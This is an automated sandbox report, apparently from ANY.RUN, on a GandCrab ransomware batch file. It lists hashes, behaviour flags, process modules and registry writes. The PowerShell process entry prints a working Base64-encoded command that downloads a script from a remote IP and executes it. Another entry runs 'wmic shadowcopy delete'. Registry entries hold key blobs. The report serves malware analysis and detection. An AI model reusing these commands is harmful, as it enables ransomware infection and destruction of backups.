General Info

File name

mal_ran.bat

Full analysis
https://app.any.run/tasks/77457807-e511-4741-aac8-f983f0f76de9
Verdict
Malicious activity
Analysis date
11/8/2018, 09:28:40
OS:
Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:

trojan

ransomware

gandcrab

Indicators:

MIME:
text/plain
File info:
ASCII text, with very long lines, with no line terminators
MD5

420ce5db06ffe3ac5f813ee99db80caf

SHA1

964702358f8dbbd2e19b0791b4b5fb8de35b1df0

SHA256

69571096d40a65abef7ef4bf0a28f01e67449754aa9018a943922179891a825d

SSDEEP

24:I4kJQ1MZfar5aecVZxMAPA9Fn2Ghf9vjVqG7EvnN/fiAS25inr:EQ1MZOfcfxMrnlpXp7EvN/ZSv

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distored by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
240 seconds
Additional time used
180 seconds
Fakenet option
off
Heavy Evaision option
off
MITM proxy
off
Route via Tor
off
Network geolocation
off
Privacy
Public submission
Autoconfirmation of UAC
off

Software preset

  • Internet Explorer 8.0.7601.17514
  • Adobe Acrobat Reader DC MUI (15.023.20070)
  • Adobe Flash Player 26 ActiveX (26.0.0.131)
  • Adobe Flash Player 26 NPAPI (26.0.0.131)
  • Adobe Flash Player 26 PPAPI (26.0.0.131)
  • Adobe Refresh Manager (1.8.0)
  • CCleaner (5.35)
  • FileZilla Client 3.36.0 (3.36.0)
  • Google Chrome (68.0.3440.106)
  • Google Update Helper (1.3.33.17)
  • Java 8 Update 92 (8.0.920.14)
  • Java Auto Updater (2.8.92.14)
  • Microsoft .NET Framework 4.6.1 (4.6.01055)
  • Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Professional 2010 (14.0.6029.1000)
  • Microsoft Office Proof (English) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (French) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
  • Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
  • Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Single Image 2010 (14.0.6029.1000)
  • Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
  • Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
  • Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
  • Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (14.15.26706.0)
  • Microsoft Visual C++ 2017 x86 Additional Runtime - 14.15.26706 (14.15.26706)
  • Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.15.26706 (14.15.26706)
  • Mozilla Firefox 61.0.2 (x86 en-US) (61.0.2)
  • Notepad++ (32-bit x86) (7.5.1)
  • Opera 12.15 (12.15.1748)
  • Skype version 8.29 (8.29)
  • VLC media player (2.2.6)
  • WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

  • Client LanguagePack Package
  • Client Refresh LanguagePack Package
  • CodecPack Basic Package
  • Foundation Package
  • IE Troubleshooters Package
  • InternetExplorer Optional Package
  • KB2534111
  • KB2999226
  • KB976902
  • LocalPack AU Package
  • LocalPack CA Package
  • LocalPack GB Package
  • LocalPack US Package
  • LocalPack ZA Package
  • ProfessionalEdition
  • UltimateEdition

Behavior activities

MALICIOUS SUSPICIOUS INFO
Renames files like Ransomware
  • powershell.exe (PID: 1684)
Executes PowerShell scripts
  • cmd.exe (PID: 3708)
GandCrab keys found
  • powershell.exe (PID: 1684)
Writes file to Word startup folder
  • powershell.exe (PID: 1684)
Dropped file may contain instructions of ransomware
  • powershell.exe (PID: 1684)
Connects to CnC server
  • powershell.exe (PID: 1684)
Deletes shadow copies
  • powershell.exe (PID: 1684)
Actions looks like stealing of personal data
  • powershell.exe (PID: 1684)
Creates files like Ransomware instruction
  • powershell.exe (PID: 1684)
Creates files in the user directory
  • notepad++.exe (PID: 3968)
  • powershell.exe (PID: 1684)
Reads Internet Cache Settings
  • powershell.exe (PID: 1684)
Reads settings of System Certificates
  • powershell.exe (PID: 1684)
Dropped object may contain TOR URL's
  • powershell.exe (PID: 1684)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Static information

Screenshots

Processes

Total processes
46
Monitored processes
7
Malicious processes
2
Suspicious processes
0

Behavior graph

+
start cmd.exe no specs cmd.exe no specs notepad++.exe gup.exe cmd.exe no specs #GANDCRAB powershell.exe wmic.exe no specs
Specs description
Program did not start
Integrity level elevation
Task сontains an error or was rebooted
Process has crashed
Task contains several apps running
Executable file was dropped
Debug information is available
Process was injected
Network attacks were detected
Application downloaded the executable file
Actions similar to stealing personal data
Behavior similar to exploiting the vulnerability
Inspected object has sucpicious PE structure
File is detected by antivirus software
CPU overrun
RAM overrun
Process starts the services
Process was added to the startup
Behavior similar to spam
Low-level access to the HDD
Probably Tor was used
System was rebooted
Connects to the network
Known threat

Process information

Click at the process to see the details.

PID
3360
CMD
cmd /c ""C:\Users\admin\Desktop\mal_ran.bat" "
Path
C:\Windows\system32\cmd.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
1
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msctf.dll
c:\windows\system32\imm32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll

PID
2328
CMD
cmd /c ""C:\Users\admin\Desktop\mal_ran.bat" "
Path
C:\Windows\system32\cmd.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
1
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll

PID
3968
CMD
"C:\Program Files\Notepad++\notepad++.exe" "C:\Users\admin\Desktop\mal_ran.bat"
Path
C:\Program Files\Notepad++\notepad++.exe
Indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Version:
Company
Don HO [email protected]
Description
Notepad++ : a free (GNU) source code editor
Version
7.51
Modules
Image
c:\program files\notepad++\notepad++.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\shell32.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sensapi.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\ole32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\imagehlp.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\bcryptprimitives.dll
c:\program files\notepad++\scilexer.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msimg32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\profapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\apphelp.dll
c:\program files\notepad++\updater\gup.exe
c:\windows\system32\windowscodecs.dll
c:\program files\notepad++\plugins\mimetools.dll
c:\program files\notepad++\plugins\nppconverter.dll
c:\program files\notepad++\plugins\nppexport.dll

PID
3116
CMD
"C:\Program Files\Notepad++\updater\gup.exe" -v7.51
Path
C:\Program Files\Notepad++\updater\gup.exe
Indicators
Parent process
notepad++.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Don HO [email protected]
Description
GUP : a free (LGPL) Generic Updater
Version
4.1
Modules
Image
c:\program files\notepad++\updater\gup.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\notepad++\updater\libcurl.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\normaliz.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\shell32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wship6.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\credssp.dll
c:\windows\system32\schannel.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\ole32.dll
c:\windows\system32\cryptbase.dll

PID
3708
CMD
"C:\Windows\system32\cmd.exe"
Path
C:\Windows\system32\cmd.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll

PID
1684
CMD
powershell.exe -nop -w hidden -e SQBmACgAJABFAE4AVgA6AFAAUgBPAEMARQBTAFMATwBSAF8AQQBSAEMASABJAFQARQBDAFQAVQBSAEUAIAAtAGMAbwBuAHQAYQBpAG4AcwAgACcAQQBNAEQANgA0ACcAKQB7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAIgAkAEUAbgB2ADoAVwBJAE4ARABJAFIAXABTAHkAcwBXAE8AVwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACIAIAAtAGEAcgBnAHUAbQBlAG4AdAAgACIASQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAOAAuADIAMQAxAC4AMQAwADUALgA5ADkALwBrAGEAcwBhACcAKQApADsASQBuAHYAbwBrAGUALQBTAFoAWQBJAEkAVABZAFIAQQBZAEgAOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAHMAIAAxADAAMAAwADAAMAAwADsAIgB9AGUAbABzAGUAewAgAEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADgALgAyADEAMQAuADEAMAA1AC4AOQA5AC8AawBhAHMAYQAnACkAKQA7AEkAbgB2AG8AawBlAC0AUwBaAFkASQBJAFQAWQBSAEEAWQBIADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwADAAMAAwADAAMAA7ACAAfQA=
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\shell32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system\9e0a3b9b9f457233a335d7fba8f95419\system.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\4bdde288f147e3b3f2c090ecdf704e6d\microsoft.powershell.consolehost.ni.dll
c:\windows\assembly\gac_msil\system.management.automation\1.0.0.0__31bf3856ad364e35\system.management.automation.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management.a#\a8e3a41ecbcc4bb1598ed5719f965110\system.management.automation.ni.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.core\fbc05b5b05dc6366b02b8e2f77d080f1\system.core.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\e112e4460a0c9122de8c382126da4a2f\microsoft.powershell.commands.diagnostics.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuratio#\f02737c83305687a68c088927a6c5a98\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.wsman.man#\f1865caa683ceb3d12b383a94a35da14\microsoft.wsman.management.ni.dll
c:\windows\assembly\gac_msil\microsoft.wsman.runtime\1.0.0.0__31bf3856ad364e35\microsoft.wsman.runtime.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.transactions\ad18f93fc713db2c4b29b25116c13bd8\system.transactions.ni.dll
c:\windows\assembly\gac_32\system.transactions\2.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\82d7758f278f47dc4191abab1cb11ce3\microsoft.powershell.commands.utility.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\583c7b9f52114c026088bdb9f19f64e8\microsoft.powershell.commands.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\6c5bef3ab74c06a641444eff648c0dde\microsoft.powershell.security.ni.dll
c:\windows\microsoft.net\framework\v2.0.50727\culture.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.xml\461d3b6b3f43e6fbe6c897d5936e17e4\system.xml.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\system.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.directoryser#\45ec12795950a7d54691591c615a9e3c\system.directoryservices.ni.dll
c:\windows\system32\shfolder.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.data\1e85062785e286cd9eae9c26d2c61f73\system.data.ni.dll
c:\windows\assembly\gac_32\system.data\2.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\nsi.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorjit.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuration\bc09ad2d49d8535371845cd7532f9271\system.configuration.ni.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\mpr.dll
c:\windows\system32\wininet.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\drprov.dll
c:\windows\system32\winsta.dll
c:\windows\system32\ntlanman.dll
c:\windows\system32\davclnt.dll
c:\windows\system32\davhlpr.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\netutils.dll
c:\windows\system32\browcli.dll
c:\windows\system32\wbem\wmic.exe
c:\windows\system32\iconcodecservice.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\sensapi.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\schannel.dll
c:\windows\system32\credssp.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\gpapi.dll
c:\windows\system32\cryptnet.dll
c:\windows\system32\cabinet.dll
c:\windows\system32\devrtl.dll

PID
3804
CMD
"C:\Windows\system32\wbem\wmic.exe" shadowcopy delete
Path
C:\Windows\system32\wbem\wmic.exe
Indicators
No indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
2147749908
Version:
Company
Microsoft Corporation
Description
WMI Commandline Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\wbem\wmic.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\framedynos.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\secur32.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\wbem\wbemprox.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\msxml3.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\program files\common files\microsoft shared\office14\msoxmlmf.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\system32\wbem\wbemsvc.dll
c:\windows\system32\wbem\fastprox.dll
c:\windows\system32\ntdsapi.dll
c:\windows\system32\wbem\wmiutils.dll

Registry activity

Total events
447
Read events
347
Write events
100
Delete events
0

Modification events

PID
Process
Operation
Key
Name
Value
3968
notepad++.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E
LanguageList
en-US
3968
notepad++.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
3968
notepad++.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
1684
powershell.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E
LanguageList
en-US
1684
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
0
1684
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
0
1684
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
4294901760
1684
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
4294901760
1684
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
1048576
1684
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
%windir%\tracing
1684
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
0
1684
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
0
1684
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
4294901760
1684
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
4294901760
1684
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
1048576
1684
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
%windir%\tracing
1684
powershell.exe
write
HKEY_CURRENT_USER\Software\ex_data\data
ext
2E006D007900780074006C00680073000000
1684
powershell.exe
write
HKEY_CURRENT_USER\Software\keys_data\data
public
0602000000A40000525341310008000001000100710440CF1D76398C09BF48F989D76A5AA9FD457D77A1D0B079D361C7818E16CA8A8C0AF8D0486982DC9CA8D6D9F0FC7D1AB46F83028CF1AA5B34BD58161CEE4E8DAEE1D0356A85FD9C08604ED2F9ABAE323AC828ABF59E5A338C8063EA352960DE44F999C85CDFDDA2F658D84F2A9EFC28C139117A3D324966D04CFFF14F2D1517F267ABC73B7DD70B526AA4A584A27A9D86850D0AE1368CA275B3B8DAB3A40A2BB2AC82D2A324BD5CDCD6237EB2B5A8F04DAE37348F18BDA9813BC611A702BAFEFC05FDB9E7E1F41BCCD96F18DCE1B3AAE75272368B0824DBD8FBC0C6B7972C15E1ADD5006589CACB48C9229CBB86D66E7F6628ED33F0C5E1A71EB1CD545BC4
1684
powershell.exe
write
HKEY_CURRENT_USER\Software\keys_data\data
private
94040000504F547F72FF76905EA15422A5A349DB0E0709C85F1D632493E96064CBD3854E8590774827440390F1DED55BF0336757AA288F56AA46D9664BDDA3668BDF14F6E74E80F44A238652BB7C2EF92DCBEF93C7721B2EC569D39FC603542269E214334A25DB6D00BFECC237714A4FFC3590A51ACF18879622F7BBE763095F863E340683275EE82D5AD7CF52BDD31B6CC8ABFB1F08E3A75088C338C933C1AB8A5EC1CACC7A4ACE323B708775C3F9D68987A1D1F1B51954A5E05C23091A7D13F7F9C9C27CBFAF04AE8B908AB256C094BEAEAC905A71E613D7878A416C2F42D031A51952EA77ECE63680B90D8813BF732C08B7F511DE8F7F275A5F8CBDCDAE55A8271B0607A6FA5C21A670FCAC461A091857B6337B533B31A04940682B66C37C2F3F3291B89C5238A45492E30B8A5C5BC0D41E0C31ADD8C49470D5091875E498DEC659987AEEFD6311C06832F8684AF58DC7189763A3454A8D5EBA73AE5766FB73690587C21F7A88FB588A78584CA00B916ABAB407B3571E333BD310167651E918AB6B89E6A1C5B8507D705F646BDE908D1D3CB2FD471A4A33A033A607721C3EAA141E027744E9773C3C6E33C8B5D1BB80E86D3BED8B54897A1C4FEADFB709E4912EDDC913E03A646E7E682D1E46A49F404BC8C74A47E69A0D705E9BAA613ADD93F6EE4AD1F650116F60BC4BBE122253227D6C3D94946AEC20E983F08E838E8AB87AFE597E05FD578E8AC6ACCE992C240E7ACA1B34C7327BD5ED2E54D58C7353062EA32EAA0F16174FFBB2181026698A353C6B35548B94C08E94F1944CE5B535CD8A4B54248E0A32CF48060E82398A6F451BF7D7DC47F3B36C5170F95E1D0D8C7696E167591765AD1419C7F0AF67EE3508A9706A9895C095FF901FE839982DF7BEDE9878C51BB6A92E3E7E1BEB47232E90CA88DB40618F353B52F2456396562B2E32737571F2CC78DD2A09302D3EB651D0695AEC568054604B7EFA525B228D9ECFAF754CEDF1792392735E60B31024AB2559B3C907583E9AFD3D1D91803476494FB23CCA95515E24733DBC3F4B41211EC9F825164A4A118579B2698A31698C1F6928B843343368FE58AA0D8EB27C4E5F25D4E9039302DBF04B20C5CD4134029B26AFCAEF49C86683ED70CF268D6F67513A32A392D6611C7725352C43F687445E67AFBAA8CB190A25904707605AB965BA6C20644DA7159529D107E9B5FD1EDB05B931FDD06B38FEBF5ADFEADA20BB12E74733E5F728EE2C31F8363F4AC6C6CA4D4E234B9220095D84D14C80ACE1F95F2F5F35B84F61FD56F744BDF5CBA5F24612E8669B7655D672088069432073C584071E1847D7470552569DDBF0152D7C4D9D2FBD81436B11B62161A3010CC92E643CC7D2D6133DA157F38C128B4D8AA3664676D44A0214850ECA4993E44ECD5CC014299D0A6448EB5DBC654222B70ADE9C777D719F874F2C955A7492EB3FB7D4887F8760AE0B17A326EC85F3C405329DBE44D7A6E049B8DE22F2B653DE